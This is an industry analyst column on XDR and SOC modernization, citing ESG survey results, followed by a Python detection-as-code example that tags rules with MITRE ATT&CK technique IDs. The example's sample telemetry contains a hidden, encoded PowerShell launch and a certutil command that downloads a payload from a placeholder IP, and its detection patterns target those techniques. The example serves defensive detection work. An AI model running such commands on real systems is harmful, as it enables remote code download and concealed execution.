Organizations are both adopting XDR technology and modernizing the SOC. New ESG research points to areas of potential overlap and even conflict between those two initiatives.

Things have certainly progressed since I started writing about XDR (extended detection and response). There are more vendors claiming to offer XDR, far beyond just the endpoint detection and response (EDR) vendors. XDR now collects, processes, and analyzes telemetry from more data sources, like cloud access security brokers (CASB), SaaS applications, and IAM systems. There are also at least three XDR "alliances": one led by CrowdStrike, another that includes vendors like Exabeam, Extrahop, Mimecast, Netskope, and SentinelOne, and a third based on standards from the Open Cybersecurity Alliance with participants like IBM and McAfee.

Yup, XDR is making progress by expanding its features and functionality. That's a great start, but some vendors believe that XDR can cover the whole security operations center technology enchilada, usurping the role of foundational technologies like security information and event management (SIEM), security orchestration, automation, and response (SOAR), and threat intelligence platforms (TIP) as organizations modernize their SOCs with more intelligence, automated workflows, and decision support for analyst processes.

So, while everyone is talking XDR, no one is telling quite the same story. ESG offers this definition: XDR is an integrated suite of security products spanning hybrid IT architectures, designed to interoperate and coordinate on threat prevention, detection, and response. XDR unifies control points, security telemetry, analytics, and operations into one enterprise system.

XDR and SOC modernization

In a recent research project, ESG asked 339 enterprise security professionals what role XDR could play in SOC modernization.
Here are their responses and my commentary:

58% of security professionals say XDR could modernize the SOC by enhancing, improving, or aggregating current security analytics capabilities. That's certainly the primary mission for XDR: providing high-fidelity alerts from data analysis across the cyber kill chain. This could modernize the SOC by automating Tier-1 analyst tasks like alert triage, leading to massive improvements in SOC efficiency and analyst productivity.

55% of security professionals say XDR could modernize the SOC by integrating with SOAR for security process automation. This objective isn't nearly as clear. XDR systems codify simple task automation, like matching a file hash against VirusTotal, while SOAR is really built to automate processes end-to-end and even integrate with ITSM systems (e.g., ServiceNow for both SOAR and ITSM). In other words, XDR and SOAR are loosely coupled at best today, and I don't see this changing. The best XDR systems will continue to take on basic task automation without the need for SOAR.

37% of security professionals say XDR could modernize the SOC by acting as a data lake for queries and investigations. This one is possible and clearly why CrowdStrike acquired Humio and SentinelOne purchased Scalyr, both cloud-based big data analytics engines. Still, many organizations are already using SIEMs as data lakes, and most SIEM vendors (e.g., Elastic, Exabeam, IBM, Splunk, SumoLogic) are already cloud based. There are also big, scalable, cloud-based platforms in this space like Chronicle and Devo that can ingest other data for investigations and threat hunting. Given this, XDR may end up being more of a data stream than a data lake.

In my humble opinion, large organizations are doing two things simultaneously: adopting XDR technology and modernizing the SOC.
XDR is used to improve threat detection efficacy while consolidating point tools, while SOC modernization is about detections as code, aligning with MITRE ATT&CK, building canned analyst workflows, and end-to-end process automation. No doubt XDR will contribute to SOC modernization, but XDR vendors already have their hands full developing advanced analytics, accommodating new data sources, automating tasks, and presenting everything to analysts in an intuitive way. Successful XDR vendors will remain heads down on these developments, at least over the next few years.
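To make two of the terms above concrete, here is an added illustration that is not part of the original column and not any vendor's product code: a "detection as code" rule stored as data together with the MITRE ATT&CK technique IDs it maps to, evaluated over constructed process-creation telemetry of the kind an EDR/XDR agent emits, with the "match a file hash" task automation mentioned earlier represented by a local reputation table standing in for a VirusTotal lookup. The rule IDs, hostnames, command lines, hashes and reputation verdicts are all constructed for this example.

```python
"""Detection-as-code rules with ATT&CK tags, run over constructed telemetry.

Added example, not from the article. All events, hashes and reputation
verdicts below are constructed; the reputation table is a stand-in for an
external service such as VirusTotal so the example runs offline.
"""
from dataclasses import dataclass
import re

# Constructed process-creation telemetry (what an EDR/XDR agent might emit).
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "alice",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c dir", "sha256": "a" * 64},
    {"host": "ws-02", "user": "bob",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
     "sha256": "b" * 64},
    {"host": "srv-07", "user": "svc_backup",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/payload.bin out.exe",
     "sha256": "c" * 64},
]


@dataclass(frozen=True)
class Rule:
    """A detection expressed as data so it can be versioned and reviewed like code."""
    id: str
    title: str
    attack_techniques: tuple   # MITRE ATT&CK technique IDs this rule covers
    image_pattern: str         # regex matched against the process image (case-insensitive)
    cmdline_patterns: tuple    # regexes that must ALL match the command line
    severity: str


RULES = (
    Rule("R-001", "PowerShell launched hidden with an encoded command",
         ("T1059.001", "T1564.003"),
         r"\\powershell\.exe$", (r"-enc", r"-w\s+hidden"), "high"),
    Rule("R-002", "certutil used to download a file from a URL",
         ("T1105",),
         r"\\certutil\.exe$", (r"-urlcache", r"https?://"), "medium"),
)

# Constructed local reputation table; stands in for a VirusTotal hash lookup.
HASH_REPUTATION = {"a" * 64: "clean", "b" * 64: "malicious"}


def hash_reputation(sha256):
    """Basic task automation: enrich an alert with a hash verdict."""
    return HASH_REPUTATION.get(sha256.lower(), "unknown")


def evaluate(rule, event):
    """True when the image matches and every command-line pattern matches."""
    if not re.search(rule.image_pattern, event["image"], re.IGNORECASE):
        return False
    return all(re.search(p, event["cmdline"], re.IGNORECASE)
               for p in rule.cmdline_patterns)


def run_detections(events, rules=RULES):
    """Apply every rule to every event; return enriched alerts in event order."""
    alerts = []
    for event in events:
        for rule in rules:
            if evaluate(rule, event):
                alerts.append({
                    "rule_id": rule.id,
                    "title": rule.title,
                    "severity": rule.severity,
                    "attack": list(rule.attack_techniques),
                    "host": event["host"],
                    "user": event["user"],
                    "sha256_reputation": hash_reputation(event["sha256"]),
                })
    return alerts


def attack_coverage(rules=RULES):
    """Sorted ATT&CK technique IDs the rule set covers, for gap analysis."""
    return sorted({t for r in rules for t in r.attack_techniques})


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
    print("ATT&CK coverage:", attack_coverage())
```

Keeping rules as data with an explicit technique mapping is what makes the "aligning with MITRE ATT&CK" step mechanical: `attack_coverage()` answers which techniques a rule set addresses, and the same rule file can be tested against recorded telemetry before it is deployed. The enrichment step is deliberately minimal; chaining it into ticketing or containment is the end-to-end automation the column attributes to SOAR rather than XDR.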